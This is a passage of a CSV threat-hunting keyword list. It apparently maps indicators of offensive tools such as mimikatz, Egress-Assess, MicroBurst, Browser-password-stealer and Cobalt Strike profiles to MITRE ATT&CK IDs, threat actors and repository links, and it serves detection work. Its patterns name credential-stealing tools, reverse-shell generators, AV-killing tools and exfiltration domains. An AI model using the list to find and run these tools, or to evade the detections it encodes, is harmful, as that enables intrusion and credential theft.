Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*methods::icmp::icmp_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Metro-Holografix/CSExec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*Metro-Holografix/Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*metsrv.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*metterpreter*","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","1555","675","2023-10-04T11:56:37Z","2014-04-03T21:18:24Z" +"*MFASweep.ps1*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" +"*mgeeky/PackMyPayload*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*mgeeky/RedWarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*mhaskar/Octopus*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*mhngpdlhojliikfknhfaglpnddniijfh*","greyware_tool_keyword","WorkingVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*mhuzaifi0604/spellbound*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*mhydeath.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*mhydeath-master*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*micahvandeusen/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" +"*micr0 shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*micr0_shell-main*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*micr0shell.py *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"*microbrownys.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*MicroBurst.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-Az.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureAD*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureREST*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureRM*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-master*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-Misc.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-MSOL*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*microchsse.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*microlilics.crabdance.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*micronaoko.jumpingcrab.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*microplants.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*microsoft-edge/cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsoft-edge/credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsoft-edge/history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsoft-edge/login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsoft-edge\cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsoft-edge\credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsoft-edge\history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsoft-edge\login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*microsploit.git*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" +"*Midl2Bytes.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" +"*--mifi-username * --mifi-password * --number +*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*mimi32.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimi64.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.pdb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikatz -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*mimikatz for Windows*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Mimikatz*","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Mimikatz.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*mimikatz.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mimikatz.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*mimikatz.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 